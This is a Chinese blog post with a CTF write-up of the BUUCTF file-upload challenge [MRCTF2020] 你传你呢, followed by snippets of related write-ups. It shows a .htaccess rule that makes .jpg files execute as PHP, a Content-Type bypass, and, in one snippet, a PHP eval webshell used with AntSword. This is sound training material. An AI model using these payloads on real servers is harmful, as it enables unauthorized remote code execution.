Web-buu-你传你呢 题后总结

最新推荐文章于 2024-11-06 09:15:27 发布
最新推荐文章于 2024-11-06 09:15:27 发布
阅读量89 收藏
点赞数 1
文章标签: 经验分享 其他 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WRplayeR/article/details/127328711
版权

 一开始一直在尝试用改一句话木马和bp抓包改包来绕过上传

 

它直接问候 ..........................

 改了很多一句木马的内容和文件拓展名,最后发现都没用。

看了大佬们的wp 发现  .htaccess

内容如下
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

可以使文件拓展名不是php的jpg文件执行php命令   

注意(Content-Type:image/jpeg)  在之前我打成了image/jpg,上传失败了

然后随便上传以jpg为拓展名的一句话木马

 最后用蚁剑连接

最后将画红线的地方和黄色的地方连接起来作为蚁剑的连接地址,在根目录下找到flag(一开始我从/var开始到1.jpg,蚂剑会报错) 

hhhalloWelt
关注
2024年网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
2401_84264096的博客
05-03 1180
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
CTF之web学习记录 -- 环境和工具篇
lifanxin的博客
05-03 2467
工具篇引言本地web环境搭建安装apache安装PHP 引言   作为一名刚入坑二进制不久的新人选手,发现ctf的道路任重而道远,恍惚间又看到一些关于二进制求生之路上的劝退语录,于是为了提升综合素养,开始学习web方向。这里是我从零到一的学习记录,写博客的好处一来是夯实基础,巩固复习,二来是分享经验,希望新入坑的读者可以少走弯路。 本地web环境搭建 安装apache   这里介绍Ubuntu下apache环境的搭建以及一些常用的终端操作命令。 # 安装apache2 sudo apt install ap
[MRCTF2020]你你呢
Sk1y的博客
03-02 2878
[MRCTF2020]你你????呢 目录 [MRCTF2020]你你????呢 上.htaccess 上1.png 蚁剑连接 题目:buu平台 解题过程: 需要上两个文件 .htaccess是什么 原文送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
学习笔记 40】 buu [MRCTF2020]你你呢
weixin_43553654的博客
08-02 432
0x00 知识点 .htaccess文件上绕过 0x01 知识点详解 什么是.htaccess文件? 答:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 怎么利用.htaccess文件进行上? 答:我们可以在.htaccess文件文件中加入php解析规则,比如,本题中就利用这个解析规则将jpg
.htaccess 文件攻击上shell
lenkee的博客
12-03 3707
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 他的意思是将该目录下的所有文...
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1319
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
buuctf [MRCTF2020]你你呢 解题过程
weixin_43031887的博客
08-29 230
AddType application/x-httpd-php .php .phtml .php3 .png #把png文件当作php文件解析。启动靶机之后通过给的连接打开之后是上图的界面,发现应该是可以通过上文件拿到控制权。AddHandler php5-script php #当文件名中出现php关键字时,文件中的内容会被当中代码执行。然后设置参数1=phpinfo()查看php信息发现正常的一句话木马函数都被disable了。发现报错,说明无法通过简单的一句话木马拿权。再次上即可拿到权限。...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2813
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
buu ctf总结
Lelouch_E的博客
11-03 1017
buuctf总结NiZhuanSiWei NiZhuanSiWei 主页是一段php代码,审计: 有file_get_content(),可以利用伪协议写入‘welcome to the zjctf
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 836
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
BUUCTF之你你马呢 [MRCTF2020]
Ran_799的博客
12-04 721
文件上绕过的方法有很多, 试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。还是被过滤掉了,接着修改一下MIME信息,判断是不是有MIME过滤,将请求头的Content-Type内容改为。上成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径,那这就好办了。接着我们切到重复器那边,随便修改一下文件后缀,判断是白名单还是黑名单绕过。然后复制一下回显的地址,并将之前的连接拼起来,得到后面的url。上该文件,抓包修改一下MIME信息。
.htaccess Apache服务器中的一个配置文件,它负责相关目录下的网页配置
越发伪文艺的王小猩
03-07 923
参考 介绍 htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。 通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 一般来说,htaccess文件需要放在网站的根目录下才能控制整个站点,并且在Linux系统中,需要把其权限设置为6
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9372
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF - [MRCTF2020]你你呢
qq_40860153的博客
10-12 464
1.打开题目,一个简单的文件上,需要利用 .htaccess 文件把.jpg文件解析成.php执行 2.上.php,发现不行,试试上.jpg,可以
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 4040
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
[MRCTF2020]你你马呢 -wp
freerats的博客
07-07 3795
一个上框,php和phtml等不能,发现可以jpg,也可以.htaccess文件 思路就比较清晰了,.htaccess文件,然后再一张jpg图片马,就会被解析为php .htaccess无法直接上,改Content-Type: image/jpeg就可以上了,成功同时还会出现上路径,省事的很 把我们的图片马上去 upload/de7a617af67d04960a345bd95c169b14/222a8.jpg 用这个路径蚁剑连接就可以了 ...
BUUCTF:[MRCTF2020]你你呢
末初的CSDN博客
12-03 1720
https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 文件上 文件后缀过滤的很全,常见的绕过方法php3/5/7/、phtml都不行 但是.htaccess可以上,只需要修改一下Content-Type为image/jpeg即可上 .htaccess AddType application/x-httpd-php .jpg 然后上一个含有一句话的jpg文件即可被当作p
buuctf web
gudugeji的博客
04-24 365
1.warmup 查看源码 2.随便注 堆叠注入 爆数据库 爆表,有两个表 构造playload:http://6d5326a4-99c2-423f-ab6f-46b44dc1853d.node3.buuoj.cn/?inject=1nject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435...
经验分享】六西格玛管理培训适合哪些人参加?
最新发布
weixin_45217569的博客
11-06 478
他们负责优化生产流程,提高生产效率和质量。例如,通过应用六西格玛方法,生产与制造工程师可以识别并消除生产过程中的瓶颈和浪费,优化生产流程,从而提高生产效率和质量水平。通过六西格玛培训,质量管理人员能够掌握DMAIC(定义、测量、分析、改进、控制)等核心方法和工具,如FMEA(失效模式与影响分析)、控制图等,从而更有效地识别和控制质量变异,提高产品和服务的质量水平。通过六西格玛方法,供应链管理人员可以更好地管理供应商,优化库存水平,提高供应链的可靠性和响应速度,从而降低企业的运营成本和提高客户满意度。
buu Quoted-printable
09-13
总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值